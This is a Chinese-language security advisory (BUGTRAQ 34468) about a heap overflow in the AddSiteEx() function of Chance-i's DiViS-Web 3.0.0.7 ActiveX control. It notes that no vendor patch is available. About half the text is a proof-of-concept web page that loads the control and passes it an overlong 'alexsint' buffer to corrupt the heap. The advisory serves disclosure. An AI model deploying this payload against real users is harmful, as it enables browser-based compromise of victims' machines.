BUGTRAQ ID: 34468
DiViS-Web是Chance-i视频监控系统所使用的基于WEB的控制软件。
DiViS-Web ActiveX控件(ActiveView.cab)没有正确地验证对AddSiteEx()函数所传送的输入参数,如果用户受骗访问了恶意网页并向该参数传送了超长参数的话,就可以触发堆溢出,导致执行任意代码。
Chance-i DiViS-Web 3.0.0.7
临时解决方法:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.divisdvr.com/divis/” target=“_blank”>http://www.divisdvr.com/divis/</a>
<OBJECT ID="DVR" classid="clsid:66F7F252-3FE1-4650-B1E5-94B2A38271C5" STYLE="width: 0px;"> <PARAM NAME="_Version" VALUE="65536">
<PARAM NAME="_ExtentX" VALUE="18203">
<PARAM NAME="_ExtentY" VALUE="13705">
<PARAM NAME="_StockProps" VALUE="0">
<PARAM NAME="Split" VALUE="4">
</OBJECT>
//server address
var g_sAddress = location.hostname;
var g_sId = "";
var g_sPwd = "";
var g_bLogin = false;
var g_nMaxCamera = 16;
// Port setting
var g_nImage = 3000;
var g_nControl = 3001;
var g_nSound = 8800;
var long_buff = "alexsint";
while(long_buff.length<(550*8)) long_buff = long_buff + "alexsint"; //rewrite registers
DVR.Channels = 1;
DVR.AddSiteEx("", "", long_buff, "", 0, g_nImage, g_nControl, g_nSound); //Crash on Free() at ntdll